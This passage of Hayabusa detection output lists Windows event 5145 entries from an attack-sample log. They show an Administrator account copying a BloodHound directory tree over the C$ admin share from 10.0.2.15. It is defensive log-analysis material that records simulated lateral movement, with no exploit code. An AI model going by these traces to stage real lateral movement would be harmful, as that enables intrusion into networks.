Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: 
\??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 
23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File 
Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File 
